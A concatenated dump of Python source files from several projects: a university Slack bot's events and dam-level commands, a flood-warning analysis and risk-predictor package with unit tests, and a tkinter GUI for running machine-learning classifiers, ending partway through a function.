self.is_valid = is_valid
self._full = full
self._weeks = weeks
self._cap = cap
self._month = month
@classmethod
def from_argument(cls, argument: str):
if not argument:
return cls(weeks=2)
else:
match = re.match(FILTER_REGEX, argument.lower())
if not match:
return cls(is_valid=False)
filter_str = match.group(0)
if filter_str in ['full', 'all']:
return cls(full=True)
elif 'week' in filter_str:
return cls(weeks=int(filter_str.split()[0]))
elif filter_str[:3] in MONTH_NUMBER:
return cls(month=MONTH_NUMBER[filter_str[:3]])
else:
return cls(cap=int(filter_str))
def filter_events(self, events: List['Event'], start_time: datetime):
if self._weeks is not None:
end_time = start_time + timedelta(weeks=self._weeks)
return [e for e in events if e.start < end_time]
if self._month is not None:
return [e for e in events if e.start.month == self._month]
elif self._cap is not None:
return events[:self._cap]
return events
def get_header(self):
if self._full:
return "List of *all* upcoming events"
elif self._weeks is not None:
return f"Events in the *next _{self._weeks}_ weeks*"
elif self._month is not None:
return f"Events in *_{month_name[self._month]}_*"
else:
return f"The *next _{self._cap}_ events*"
def get_no_result_msg(self):
if self._weeks is not None:
return f"There don't appear to be any events in the next *{self._weeks}* weeks"
elif self._month is not None:
return f"There don't appear to be any events in *{month_name[self._month]}*"
else:
return "There don't appear to be any upcoming events..."
class Event(object):
def __init__(self, start: datetime, end: datetime,
location: str, summary: str, link: Optional[str]):
self.start = start
self.end = end
self.location = location
self.summary = summary
self.link = link
@classmethod
def encode_text(cls, text: str) -> str:
"""
Encodes user-specified text so that it is not interpreted as command characters
by Slack. Implementation as required by: https://api.slack.com/docs/message-formatting
Note that this encoding process does not stop injection of text effects (bolding,
underlining, etc.), or a malicious user breaking the text formatting in the events
command. It should, however, prevent <, & and > being misinterpreted and including
links where they should not.
--
:param text: The text to encode
:return: The encoded text
"""
        return text.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
@classmethod
def from_cal_event(cls, cal_event):
start = cal_event.get('dtstart').dt
end = cal_event.get('dtend').dt
# ical 'dt' properties are parsed as a 'DDD' (datetime, date, duration) type.
# The below code converts a date to a datetime, where time is set to midnight.
if isinstance(start, date) and not isinstance(start, datetime):
start = datetime.combine(start, datetime.min.time()).astimezone(utc)
if isinstance(end, date) and not isinstance(end, datetime):
end = datetime.combine(end, datetime.max.time()).astimezone(utc)
location = cal_event.get('location', 'TBA')
summary = cal_event.get('summary')
return cls(start, end, location, summary, None)
@classmethod
def from_seminar(cls, seminar_event: Tuple[str, str, datetime, str]):
title, link, start, location = seminar_event
# ITEE doesn't specify the length of seminars, but they are normally one hour
end = start + timedelta(hours=1)
return cls(start, end, location, title, link)
def __str__(self):
d1 = self.start.astimezone(BRISBANE_TZ)
d2 = self.end.astimezone(BRISBANE_TZ)
start_str = (f"{day_abbr[d1.weekday()].upper()}"
+ f" {month_abbr[d1.month].upper()} {d1.day} {d1.hour}:{d1.minute:02}")
if (d1.month, d1.day) != (d2.month, d2.day):
end_str = (f"{day_abbr[d2.weekday()].upper()}"
+ f" {month_abbr[d2.month].upper()} {d2.day} {d2.hour}:{d2.minute:02}")
else:
end_str = f"{d2.hour}:{d2.minute:02}"
# Encode user-provided text to prevent certain characters
# being interpreted as slack commands.
summary_str = Event.encode_text(self.summary)
location_str = Event.encode_text(self.location)
if self.link is None:
return f"*{start_str} - {end_str}* - `{summary_str}` - _{location_str}_"
else:
return f"*{start_str} - {end_str}* - `<{self.link}|{summary_str}>` - _{location_str}_"
def get_current_time():
"""
returns the current date and time
this function exists purely so it can be mocked for testing
"""
return datetime.now(tz=BRISBANE_TZ).astimezone(utc)
@bot.on_command('events')
@loading_status
def handle_events(command: Command):
"""
`!events [full|all|NUM EVENTS|<NUM WEEKS> weeks] [uqcs|itee]`
- Lists all the UQCS and/or ITEE events that are
scheduled to occur within the given filter.
If unspecified, will return the next 2 weeks of events.
"""
argument = command.arg if command.has_arg() else ""
source_get = {"uqcs": False, "itee": False}
for k in source_get:
if k in argument:
source_get[k] = True
argument = argument.replace(k, "")
argument = argument.strip()
if not any(source_get.values()):
source_get = dict.fromkeys(source_get, True)
event_filter = EventFilter.from_argument(argument)
if not event_filter.is_valid:
raise UsageSyntaxException()
cal = Calendar.from_ical(get_calendar_file())
current_time = get_current_time()
events = []
# subcomponents are how icalendar returns the list of things in the calendar
if source_get["uqcs"]:
for c in cal.subcomponents:
# TODO: support recurring events
# we are only interested in ones with the name VEVENT as they
# are events we also currently filter out recurring events
if c.name != 'VEVENT' or c.get('RRULE') is not None:
continue
# we convert it to our own event class
event = Event.from_cal_event(c)
# then we want to filter out any events that are not after the current time
if event.start > current_time:
events.append(event)
if source_get["itee"]:
try:
# Try to include events from the ITEE seminars page
seminars = get_seminars()
for seminar in seminars:
# The ITEE website only lists current events.
event = Event.from_seminar(seminar)
events.append(event)
except (HttpException, InvalidFormatException) as e:
bot.logger.error(e.message)
# then we apply our event filter as generated earlier
events = event_filter.filter_events(events, current_time)
# then, we sort the events by date
events = sorted(events, key=lambda e: e.start)
# then print to the user the result
if not events:
message = (f"_{event_filter.get_no_result_msg()}_\r\n"
"For a full list of events, visit: https://uqcs.org.au/calendar.html"
+ " and https://www.itee.uq.edu.au/seminar-list")
else:
message = f"{event_filter.get_header()}\r\n" + '\r\n'.join(str(e) for e in events)
bot.post_message(command.channel_id, message)
def get_calendar_file() -> bytes:
"""
Loads the UQCS Events calender .ics file from Google Calendar.
This method is mocked by unit tests.
:return: The returned ics calendar file, as a stream
"""
http_response = requests.get(CALENDAR_URL)
return http_response.content
```
#### File: uqcsbot/scripts/water.py
```python
from uqcsbot import bot, Command
import requests
from bs4 import BeautifulSoup
from typing import List, Tuple
from uqcsbot.utils.command_utils import UsageSyntaxException
LIST_COMMAND = ['ls', 'list', 'dir']
REGIONS = {
'seq': {
'aliases': ['brisbane', 'bne', 'brisvegas', 'qld', 'queensland'],
'url': 'https://www.seqwater.com.au/dam-levels'
}
}
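# Example: '!water bne' resolves through the 'seq' alias list above to the
# Seqwater dam-levels page.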
@bot.on_command("water")
def handle_water(command: Command):
"""
`!water <REGION>` - Prints the dam level for the region.
`!water <LIST|LS|DIR>` - Prints a list of all regions.
"""
if not command.has_arg():
raise UsageSyntaxException()
words = command.arg.split(' ')
if len(words) > 1:
raise UsageSyntaxException()
response = []
# Print the list of regions
if words[0].lower() in LIST_COMMAND:
response.append("Available regions:")
for region in REGIONS:
response.append(f">{region} (aliases: {', '.join(REGIONS[region]['aliases'])})")
else:
# Print the info for a specific region
        if words[0].lower() in REGIONS or any(words[0].lower() in region['aliases'] for region in REGIONS.values()):
actual_region = words[0].lower()
name = words[0]
if words[0].lower() not in REGIONS:
for region in REGIONS:
if words[0].lower() in REGIONS[region]['aliases']:
actual_region = region
name = region
if actual_region == 'seq':
http_response = requests.get(REGIONS[actual_region]['url'])
html = BeautifulSoup(http_response.content, 'html.parser')
maximum_prev_sibling = html.find("div", string='Full supply capacity')
maximum_reading = maximum_prev_sibling.find_next_sibling("div")
current_prev_sibling = html.find("div", string='Current capacity')
current_reading = current_prev_sibling.find_next_sibling("div")
maximum = int("".join(list(filter(str.isdigit, maximum_reading.get_text()))))
current = int("".join(list(filter(str.isdigit, current_reading.get_text()))))
percent = 100 * (current / maximum)
response.append(f"{name} is at *{percent:3.2f}%* ({current:,}ML of {maximum:,}ML)")
else:
response.append(f"No region or alias found matching '{words[0]}'")
else:
response.append(f"No region or alias found matching '{words[0]}'")
bot.post_message(command.channel_id, '\r\n'.join(response))
``` |
{
"source": "Joseph-Garvey/Flood-Warning",
"score": 3
} |
#### File: Flood-Warning/floodsystem/analysis.py
```python
import numpy as np
import matplotlib.dates as dt
import matplotlib.pyplot as plt
# implement function
# input: water level time history (dates, levels) for a station
# computes least-squares fit polynomial of a degree p to water level data
# returns:
# tuple of
# polynomial object
# shift of time (date) axis
#task 2F
#TODO #2 return correct object
#TODO #9 test whether this returns the correct type
def polyfit(dates, levels, p):
dates = dt.date2num(dates)
p_coeff = np.polyfit(dates - dates[0], levels, p)
poly = np.poly1d(p_coeff)
    return poly, dates[0]  # dates were already converted to matplotlib date numbers above
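# Example usage (a sketch; `dates` is a list of datetimes, `levels` their readings):
#   poly, t0 = polyfit(dates, levels, 4)
#   fitted = poly(dt.date2num(dates) - t0)  # evaluate on the shifted time axis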
def gradientcalc(poly, t):
der = np.polyder(poly)
return der(t)
```
#### File: Flood-Warning/floodsystem/predictor.py
```python
from .station import MonitoringStation
def predictor(stations, gradient_weight, rel_weight, abs_weight):
"""assigns an attribute 'station_risk' to each MonitoringStation object based on a weighted sum of rel_water_level & gradient
Parameters:
stations = list of MonitoringStation objects \n
gradient_weight = weight of gradient \n
relative_weight = weight of rel_water_level
abs_weight = weight of absolute level difference from average of typical range values
"""
for station in stations:
station_risk = (gradient_weight * (station.der) + rel_weight *
(station.relative_water_level) + abs_weight * (station.latest_level - (station.typical_range[0] + station.typical_range[1]) / 2)) / (gradient_weight + rel_weight)
station.station_risk = station_risk
return stations
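# Example (a sketch; the weights mirror the accompanying test suite):
#   stations = predictor(stations, gradient_weight=1, rel_weight=5, abs_weight=15)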
def assigning_risk(stations, severe_threshold, high_threshold, moderate_threshold):
"""assigns an attribute string (1 of 4: โsevereโ, โhighโ, โmoderateโ or โlowโ) to each station object
Parameters:
stations = list of MonitoringStation objects \n
thresholds = floats that determine what station_risk values count as each label
"""
for station in stations:
if station.station_risk > severe_threshold:
risk_label = "severe"
elif station.station_risk > high_threshold:
risk_label = "high"
elif (station.station_risk > moderate_threshold) or station.latest_level > station.typical_range[1]:
risk_label = "moderate"
else:
risk_label = "low"
station.risk_label = risk_label
return stations
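# Example (a sketch; the thresholds mirror the accompanying test suite):
#   stations = assigning_risk(stations, severe_threshold=3, high_threshold=2.25,
#                             moderate_threshold=1.5)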
```
#### File: Joseph-Garvey/Flood-Warning/Task1F.py
```python
from floodsystem.stationdata import build_station_list
from floodsystem.station import inconsistent_typical_range_stations
def run():
"""Task 1F: prints a list of station names, in alphabetical order, for stations with inconsistent data"""
# Build list of stations
stations = build_station_list()
# Create empty list
incons_station_names = []
# Loop over incons_stations list
for station in inconsistent_typical_range_stations(stations):
# Get station names
incons_station_names.append(station.name)
# Sort list by alphabetical order & print
sorted_incons_station_names = sorted(incons_station_names)
print(sorted_incons_station_names)
if __name__ == "__main__":
print("*** Task 1F: CUED Part IA Flood Warning System ***")
run()
```
#### File: Joseph-Garvey/Flood-Warning/test_predictor.py
```python
from floodsystem.station import MonitoringStation
from floodsystem.predictor import predictor, assigning_risk
# Create a list of dummy stations, each with a consistent typical range and preset latest levels and gradients
station_D = MonitoringStation('ID D', 'Measurement ID D', 'Name D', (0.0, 20.0), (1.0, 2.0), 'Big River', 'Town D')
station_D.latest_level = 1.5
station_D.der = 2.0
station_E = MonitoringStation('ID E', 'Measurement ID E', 'Name E', (0.0, 20.0), (1.0, 2.0), 'Big River', 'Town E')
station_E.latest_level = 1.9
station_E.der = 1.0
station_F = MonitoringStation('ID F', 'Measurement ID F', 'Name F', (0.0, 20.0), (1.0, 2.0), 'Big River', 'Town F')
station_F.latest_level = 2.0
station_F.der = 2.0
station_list = [station_D, station_E, station_F]
def test_predictor():
predictor(station_list, gradient_weight=1, rel_weight=5, abs_weight=15)
# assert that attribute type is a float
for station in station_list:
assert type(station.station_risk) == float
# assert that attribute value is as expected
assert station_D.station_risk == 0.75
assert station_E.station_risk == 1.9166666666666663
assert station_F.station_risk == 2.4166666666666665
def test_assigning_risk():
assigning_risk(station_list, severe_threshold=3, high_threshold=2.25, moderate_threshold=1.5)
# assert that attribute type is a string
for station in station_list:
assert type(station.risk_label) == str
# assert that attribute value is as expected
assert station_D.risk_label == 'low'
assert station_E.risk_label == 'moderate'
assert station_F.risk_label == 'high'
``` |
{
"source": "Joseph-Garzon/MachineLearningGUI",
"score": 3
} |
#### File: Joseph-Garzon/MachineLearningGUI/newML_gui_v11.py
```python
from tkinter import Tk, ttk, Frame, Button, Label, Entry, Text, Checkbutton, Radiobutton,\
Scale, Listbox, Menu, N, E, S, W, HORIZONTAL, END, FALSE, IntVar, StringVar
#from tkinter import BOTH, RIGHT, RAISED, messagebox as box, PhotoImage
#import os
import numpy as np
import matplotlib.pyplot as plt
import read_text_file as rd
import read_header_line as rhl
import scatterg as a2dscatter
import scatterg3D as a3dscatter
import Normalize_Features as NF
import Randomize_training_samples as RTS
#import Gather_Attrib_Statistics as SA
#Creating GUI
class Compact_Frame(Frame):
def __init__(self, master): #Initialize the frame
super(Compact_Frame, self).__init__(master) #super class Constructor
self.pack() #Make the frame a pack to control geometry.
self.FeaturesDef = ['X1',
'X2',
'X3',
'...',
'...',
'Y']
self.NormalizeVar=0
self.v=IntVar(self)
self.v.set(1) #Initialize without normalization or randomization
self.v_dim=IntVar(self)
self.v_dim.set(2) #Initialize dimensions to 2D
self.sizeTrainXval=StringVar(self)
self.sizeTrainXval.set('Click Button')
self.centreWindow()
self.create_widgets()
self.plot_data()
self.plot_predictions()
self.dimension()
def create_widgets(self): #Create a new class for widgets
#Event Menu Bar
menubar = Menu(self.master)
self.master.config(menu=menubar)
fileMenu = Menu(menubar)
fileMenu.add_command(label="Input Training Data", command=self.input_train_file)
fileMenu.add_command(label="Input Unlabeled Data", command=self.input_unlabeled_file)
fileMenu.add_command(label="Exit", command=self.quit)
menubar.add_cascade(label="File", menu=fileMenu)
#Event Label/text box that will be shown adjacent text box (Training File Label)
self.TrainingNameLabel = Label(self, text="Training File:")
self.TrainingNameLabel.grid(row=0, column=0, sticky=W+E)
self.TrainingNameText = Entry(self, width=20)
self.TrainingNameText.grid(row=0, column=1, padx=5, pady=5, ipady=2, sticky=W+E)
#Event Label/text box that will be shown adjacent text box (Unlabeled (application File Label)
self.ApplicationNameLabel = Label(self, text="Application File:")
self.ApplicationNameLabel.grid(row=1, column=0, sticky=W+E)
self.ApplicationNameText = Entry(self, width=20)
self.ApplicationNameText.grid(row=1, column=1, padx=5, pady=5, ipady=2, sticky=W+E)
#Event Feature List Box
self.FeaturesDefList = Listbox(self, height=6)
for t in self.FeaturesDef:
self.FeaturesDefList.insert(END, t)
self.FeaturesDefList.grid(row=2, column=0, columnspan=2, pady=5, sticky=N+E+S+W)
#Event Labels and text boxes to populate matrix
self.X1_label = Label(self, text="X1 in column")
self.X1_label.grid(row=4, column=0, sticky=W)
self.X2_label = Label(self, text="X2 in column")
self.X2_label.grid(row=5, column=0, sticky=W)
self.X3_label = Label(self, text="X3 in column")
self.X3_label.grid(row=6, column=0, sticky=W)
self.y_label = Label(self, text="Label in column")
self.y_label.grid(row=7, column=0, sticky=W)
self.num_labels = Label(self, text="# of Labels")
self.num_labels.grid(row=8, column=0, sticky=W)
self.X1 = Entry(self)
self.X1.grid(row=4, column=1, sticky=W)
self.X2 = Entry(self)
self.X2.grid(row=5, column=1, sticky=W)
self.X3 = Entry(self)
self.X3.grid(row=6, column=1, sticky=W)
self.y = Entry(self)
self.y.grid(row=7, column=1, sticky=W)
self.num_labels = Entry(self)
self.num_labels.grid(row=8, column=1, sticky=W)
#Event icon in to Populate matrix
from PIL import Image, ImageTk
self.image = Image.open("LeftArrow_Icon2.JPG")
self.resized = self.image.resize((23, 10),Image.ANTIALIAS)
self.arrow=ImageTk.PhotoImage(self.resized)
#Event buttons to Populate matrix
self.X1_button = Button(self, width=10, command=self.X1bttnAction)
self.X1_button.grid(row=4, column=1, padx=130, sticky=W)
self.X1_button.config(image=self.arrow, width=25,height=12)
self.X2_button = Button(self, width=10, command=self.X2bttnAction)
self.X2_button.grid(row=5, column=1, padx=130, sticky=W)
self.X2_button.config(image=self.arrow, width=25,height=12)
self.X3_button = Button(self, width=10, command=self.X3bttnAction)
self.X3_button.grid(row=6, column=1, padx=130, sticky=W)
self.X3_button.config(image=self.arrow, width=25,height=12)
self.y_button = Button(self, width=10, command=self.ybttnAction)
self.y_button.grid(row=7, column=1, padx=130, sticky=W)
self.y_button.config(image=self.arrow, width=25,height=12)
#########
#Event Matrix Text after selecting the features and averaging
self.MatrixText = Text(self, padx=5, pady=5, width=20, height=10)
self.MatrixText.grid(row=9, column=0, columnspan=3, pady=5, sticky=N+E+S+W)
#Event Label Text after selecting the features and averaging
self.labelText = Text(self, padx=5, pady=5, width=20, height=10)
self.labelText.grid(row=9, column=3, columnspan=1, pady=5, sticky=N+E+S+W)
## columns>=2
#Event Sliding bar Training Samle Size and label
self.sizeVar = StringVar()
self.sizeLabel = Label(self, text="Training Sample Size:",
textvariable=self.sizeVar)
self.sizeLabel.grid(row=0, column=2, columnspan=2, sticky=W+E)
self.sizeScale = Scale(self, from_=10, to=100, orient=HORIZONTAL,
resolution=5, command=self.onsizeScale, tickinterval=10)
self.sizeScale.grid(row=1, column=2, columnspan=2, padx=10, sticky=W+E)
#Event label training and xvalidation matrix shapes
# self.sizeTrainXval=StringVar()
self.MatrixLabel = Label(self, text="Training Shape:",
textvariable=self.sizeTrainXval)
self.MatrixLabel.grid(row=0, column=4, columnspan=2, padx=10, sticky=E+W)
#Event create training and xvalidation samples
self.TrainXvalBtn = Button(self, text="Training Matrix", width=30, command=self.RandomTrainSample)
self.TrainXvalBtn.grid(row=1, column=4, columnspan=2, padx=10, sticky=E+W)
#Event Checkbutton to normalize training data.
self.NormalizeVar = IntVar()
self.NormalizeCheckBtn = Checkbutton(self, text="Normalized?", variable=self.NormalizeVar, command=self.NormChecked)
self.NormalizeCheckBtn.grid(row=2, column=4, sticky=W+N)
#Event estimate Average
self.AvgBtn = Button(self, text="Gather Average", width=10, command=self.GatherAverage)
self.AvgBtn.grid(row=2, column=2, padx=5, pady=40, sticky=W+N+S)
self.check_Matrix = Button(self, text="Define/Check Matrix X", command=self.reveal_matrix)
self.check_Matrix.grid(row=7, column=3, sticky=W+E)
#Label Method Selection Combo Box
self.algorithmLabel = Label(self, text="Method")
self.algorithmLabel.grid(row=10, column=0, sticky=W+E)
######### Bottom, application of the algorithms
#Event Combo Box 1 Method of Machine Learning
self.methodVar = StringVar()
self.methodCombo = ttk.Combobox(self, textvariable=self.methodVar)
self.methodCombo['values'] = ('Select Method',
'Naive Bayes',
'Logistical Regression',
'Support Vector Machine',
'Neural Network SciKit',
'Neural Network 2')
self.methodCombo.current(0)
self.methodCombo.bind("<<ComboboxSelected>>", self.newMethod)
self.methodCombo.grid(row=10, column=1, padx=5, pady=10, ipady=4, sticky=W)
#Event estimate Average
self.RunMLalgBtn = Button(self, text="Run ML Alg.", width=10, command=self.RunML)
self.RunMLalgBtn.grid(row=10, column=2, padx=5, pady=3, sticky=W+E)
#Output labeled data
self.outputBtn=Button(self, text="Output", width=10, command=self.outputtxt)
self.outputBtn.grid(row=9, column=4, padx=5, pady=3, sticky=W+E)
#Event Score
self.scoreVar = StringVar()
self.scoreVar.set("Score")
#Label Score
self.scoreLabel= Label(self, textvariable=self.scoreVar)
self.scoreLabel.grid(row=10, column=3, sticky=W+E)
#Event runtime
self.runtimeVar = StringVar()
self.runtimeVar.set("Runtime")
#Label Score
self.runtimeLabel= Label(self, textvariable=self.runtimeVar)
self.runtimeLabel.grid(row=10, column=4, sticky=W+E)
######### Matrix Dimensions
def dimension(self):
options_dim =[("1D",1),("2D",2),("3D",3),("All D",4)]
for txt_dim,val_dim in options_dim:
self.options_dim_radiobuttons=Radiobutton(self,
text=txt_dim,
padx=20,
variable=self.v_dim,
value=val_dim)
self.options_dim_radiobuttons.grid(row=3+val_dim, column=2, sticky=W)
########################
######### Bottom, Plot Left
def plot_data(self): #Scatter Widgets
self.HistogramBtn = Button(self, text="Histogram", width=10, command=self.HistogramClass)
self.HistogramBtn.grid(row=11, column=0, padx=5, pady=3, sticky=W+E)
self.a1dscatterBtn = Button(self, text="1DScatter", width=10, command=self.scatter1D)
self.a1dscatterBtn.grid(row=12, column=0, padx=5, pady=3, sticky=W+E)
self.a2dscatterBtn = Button(self, text="2DScatter", width=10, command=self.scatter2D)
self.a2dscatterBtn.grid(row=13, column=0, padx=5, pady=3, sticky=W+E)
self.a3dscatterBtn = Button(self, text="3DScatter", width=10, command=self.scatter3D)
self.a3dscatterBtn.grid(row=14, column=0, padx=5, pady=3, sticky=W+E)
options =[("Average Gather",1),
("Average Gather Randomized Training",2),
("Average Gather Randomized Xvalidation",3),
("Average Gather Normalized Random Training",4),
("Average Gather Normalized Random Xvalidation",5),
("Full Gather",6),
]
for txt,val in options:
self.options_radiobuttons=Radiobutton(self,
text=txt,
padx=20,
variable=self.v,
value=val)
self.options_radiobuttons.grid(row=10+val, column=1, sticky=W)
######### Bottom, Plot right
def plot_predictions(self): #Scatter Widgets
self.HistogramBtn_pred = Button(self, text="HistogramPred", width=10, command=self.HistogramClass_pred)
self.HistogramBtn_pred.grid(row=11, column=2, padx=5, pady=3, sticky=W+E)
self.a1dscatterBtn_pred = Button(self, text="1DScatterPred", width=10, command=self.scatter1D_pred)
self.a1dscatterBtn_pred.grid(row=12, column=2, padx=5, pady=3, sticky=W+E)
self.a2dscatterBtn_pred = Button(self, text="2DScatterPred", width=10, command=self.scatter2D_pred)
self.a2dscatterBtn_pred.grid(row=13, column=2, padx=5, pady=3, sticky=W+E)
self.a3dscatterBtn_pred = Button(self, text="3DScatterPred", width=10, command=self.scatter3D_pred)
self.a3dscatterBtn_pred.grid(row=14, column=2, padx=5, pady=3, sticky=W+E)
self.quickplotBtn=Button(self, text="QuickPlot_ppt", width=10, command=self.quickplotppt)
self.quickplotBtn.grid(row=15, column=2, padx=5, pady=3, sticky=W+E)
###################### Event Handlers
#Event handler: center the window and size it adequately
def centreWindow(self):
w = 1100
h = 780
sw = self.master.winfo_screenwidth()
sh = self.master.winfo_screenheight()
x = (sw - w)/2
y = (sh - h)/2
self.master.geometry('%dx%d+%d+%d' % (w, h, x, y))
#Event handler: Input training data via Menu Bar
def input_train_file(self):
global X
global header_list
from tkinter.filedialog import askopenfilename
filename=askopenfilename()
header_list=rhl.read_header_line(filename)
X=rd.read_text_file(filename)
self.TrainingNameText.delete(0, END)
self.TrainingNameText.insert(0,filename)
self.FeaturesDefList.delete(0, END)
#Event handler FeaturesDefList
counter=0
for t in header_list:
header_column=str(counter)
self.FeaturesDefList.insert(END, t + " "+ header_column)
counter=counter+1
print (X)
#Event handler: Input unlabeled application data via Menu Bar
def input_unlabeled_file(self):
global Xapp
global output_file
from tkinter.filedialog import askopenfilename
filename=askopenfilename()
Xapp=rd.read_text_file(filename)
self.ApplicationNameText.delete(0, END)
self.ApplicationNameText.insert(0,filename)
print (Xapp)
output_file=filename+"_out.txt"
#Event handler: Button Get Averages
def GatherAverage(self):
global XGather
global XappGather
# XGather=SA.XGather(X)
# print (XGather)
# XappGather=SA.XGather(Xapp)
XGather=X
XappGather=Xapp
########################################
#Event Handler, buttons to update matrix
def X1bttnAction(self):
X1feature=self.FeaturesDefList.curselection()
self.X1.insert(END,X1feature)
def X2bttnAction(self):
X2feature=self.FeaturesDefList.curselection()
self.X2.insert(END,X2feature)
def X3bttnAction(self):
X3feature=self.FeaturesDefList.curselection()
self.X3.insert(END,X3feature)
def ybttnAction(self):
yfeature=self.FeaturesDefList.curselection()
self.y.insert(END,yfeature)
############ end buttons for ease of matrix definition
#Event Handler MatrixText
def reveal_matrix(self):
import numpy as np
global Xin, u_label, Xout
global u_label
u_label=np.zeros((len(XGather[:,1]),1))
col_y = self.y.get()
if col_y == "":
message = "Always need Label"
self.y.insert(END,message)
else:
col_y=int(col_y)
u_label=XGather[:,col_y]
chosen_dim=self.v_dim.get()
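        # Allocate the feature matrices to match the selected dimensionality:
        # 1-3 columns for 1D/2D/3D, or every column except the label for "All D".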
if chosen_dim==1:
Xin=np.zeros((len(XGather[:,1])))[np.newaxis].T
Xout=np.zeros((len(XappGather[:,1])))[np.newaxis].T
elif chosen_dim==2:
Xin=np.zeros((len(XGather[:,1]),2))
Xout=np.zeros((len(XappGather[:,1]),2))
elif chosen_dim==3:
Xin=np.zeros((len(XGather[:,1]),3))
Xout=np.zeros((len(XappGather[:,1]),3))
elif chosen_dim==4:
Xin=np.delete(XGather,col_y,axis=1)
Xout=np.delete(XappGather,col_y,axis=1)
col_X1 = self.X1.get()
if col_X1 == "":
message = "Neeed # for 1D,2D,3D"
self.X1.insert(END,message)
else:
col_X1=int(col_X1)
Xin[:,0]=XGather[:,col_X1]
Xout[:,0]=XappGather[:,col_X1]
col_X2 = self.X2.get()
if col_X2 == "":
message = "Neeed # for 2D,3D"
self.X2.insert(END,message)
else:
col_X2=int(col_X2)
Xin[:,1]=XGather[:,col_X2]
Xout[:,1]=XappGather[:,col_X2]
col_X3 = self.X3.get()
if col_X3 == "":
message = "Neeed # for 3D"
self.X3.insert(END,message)
else:
col_X3=int(col_X3)
Xin[:,2]=XGather[:,col_X3]
Xout[:,2]=XappGather[:,col_X3]
self.MatrixText.delete(0.0,END)
self.MatrixText.insert(0.0,Xin[0:9,:])
self.labelText.delete(0.0,END)
display_label=np.array(u_label[0:9])[np.newaxis].T
print(display_label)
self.labelText.insert(0.0,display_label[0:9,:])
#Event Handler Button MatrixShape:
def RandomTrainSample(self):
global Xtrain,labeltrain,X_xval,label_xval
train_size_pct=self.sizeScale.get()
Xtrain,labeltrain,X_xval,label_xval=RTS.randomTrain(Xin,u_label,train_size_pct)
self.sizeTrainXval.set("Training Matrix: " + str(Xtrain.shape)+ " XValidation Matrix: " + str(X_xval.shape))
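        # NB (assumed behaviour of NF.featureNormalize): when the Normalized?
        # box is ticked, the training and cross-validation splits are scaled
        # independently, each with its own statistics.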
normalization_choice=self.NormalizeVar.get()
if normalization_choice==1:
Xtrain=NF.featureNormalize(Xtrain)
X_xval=NF.featureNormalize(X_xval)
    #Event handler: Combo Box 1, algorithm
def newMethod(self, event):
print(self.methodVar.get())
algorithm=self.methodCombo.get()
if algorithm=='Support Vector Machine':
self.svm_parms()
        elif algorithm=='Logistic Regression':
self.logisticReg_parms()
elif algorithm=='Neural Network SciKit':
self.NeuralNetSciKit_parms()
        elif algorithm=='Neural Network 2':
            self.NeuralNet_parms1()
elif algorithm=='Naive Bayes':
self.NaiveBayes_parms()
def svm_parms(self):
self.kernel_label = Label(self, text="kernel ")
self.kernel_label.grid(row=11, column=3, sticky=W)
self.kernel_text = Entry(self)
self.kernel_text.grid(row=11, column=4, sticky=W)
self.kernel_text.delete(0,END)
self.kernel_text.insert(0,'rbf')
self.gamma_label = Label(self, text="Gamma ")
self.gamma_label.grid(row=12, column=3, sticky=W)
self.gamma_text = Entry(self)
self.gamma_text.grid(row=12, column=4, sticky=W)
self.gamma_text.delete(0,END)
self.gamma_text.insert(0,'1.0')
def logisticReg_parms(self):
self.solver_label = Label(self, text="Solver ")
self.solver_label.grid(row=11, column=3, sticky=W)
self.solver_text = Entry(self)
self.solver_text.grid(row=11, column=4, sticky=W)
self.solver_text.delete(0,END)
self.solver_text.insert(0,'liblinear')
self.gamma_label = Label(self, text="Inv. Reg Strength")
self.gamma_label.grid(row=12, column=3, sticky=W)
self.gamma_text = Entry(self)
self.gamma_text.grid(row=12, column=4, sticky=W)
self.gamma_text.delete(0,END)
self.gamma_text.insert(0,'1.0')
def NeuralNet_parms1(self):
self.numweightsinlayer1_label = Label(self, text="Hidden Layer Size")
self.numweightsinlayer1_label.grid(row=11, column=3, sticky=W)
self.numweightsinlayer1_text = Entry(self)
self.numweightsinlayer1_text.grid(row=11, column=4, sticky=W)
self.numweightsinlayer1_text.delete(0,END)
self.numweightsinlayer1_text.insert(0,'25')
self.maxiter_label = Label(self, text="Maximum Iterations ")
self.maxiter_label.grid(row=12, column=3, sticky=W)
self.maxiter_text = Entry(self)
self.maxiter_text.grid(row=12, column=4, sticky=W)
self.maxiter_text.delete(0,END)
self.maxiter_text.insert(0,'250')
def NeuralNetSciKit_parms(self):
self.hidden_layer_sizes_label = Label(self, text="Hidden Layer Sizes")
self.hidden_layer_sizes_label.grid(row=11, column=3, sticky=W)
self.hidden_layer_sizes_text = Entry(self)
self.hidden_layer_sizes_text.grid(row=11, column=4, sticky=W)
self.hidden_layer_sizes_text.delete(0,END)
self.hidden_layer_sizes_text.insert(0,'5,2')
self.solver_label = Label(self, text="Solver ")
self.solver_label.grid(row=12, column=3, sticky=W)
self.solver_text = Entry(self)
self.solver_text.grid(row=12, column=4, sticky=W)
self.solver_text.delete(0,END)
self.solver_text.insert(0,'lbfgs')
self.alpha_label = Label(self, text="Alpha ")
self.alpha_label.grid(row=13, column=3, sticky=W)
self.alpha_text = Entry(self)
self.alpha_text.grid(row=13, column=4, sticky=W)
self.alpha_text.delete(0,END)
self.alpha_text.insert(0,'1e-5')
def NaiveBayes_parms(self):
# self.priors_label = Label(self, text="Priors ")
# self.priors_label.grid(row=11, column=3, sticky=W)
# self.priors_text = Entry(self)
# self.priors_text.grid(row=11, column=4, sticky=W)
# self.priors_text.delete(0,END)
# self.priors_text.insert(0,'None')
self.priorsdesc_label = Label(self, text=" ")
self.priorsdesc_label.grid(row=11, column=3, sticky=W)
self.priorsdesc2_label = Label(self, text=" ")
self.priorsdesc2_label.grid(row=11, column=4, sticky=W)
self.priorsdesc_label = Label(self, text=" ")
self.priorsdesc_label.grid(row=12, column=3, sticky=W)
self.priorsdesc2_label = Label(self, text=" ")
self.priorsdesc2_label.grid(row=12, column=4, sticky=W)
#Event Handler:
def RunML(self):
from time import time
global Xout_pred_label,train_pred_label,xval_pred_label
print ("Xin:", Xin.shape, "Xtrain:",Xtrain.shape, "ytrain: ", labeltrain.size, "Xxval: ",X_xval.shape,"yval: ",label_xval.shape)
normalization_choice=self.NormalizeVar.get()
Xout_pred=Xout
if normalization_choice==1:
Xout_pred=NF.featureNormalize(Xout)
print("Normalization (0=False, 1=True): ",normalization_choice)
algorithm=self.methodCombo.get()
print("Machine Learning Algorithm chosen: ",algorithm)
t0 = time()
if algorithm=='Naive Bayes':
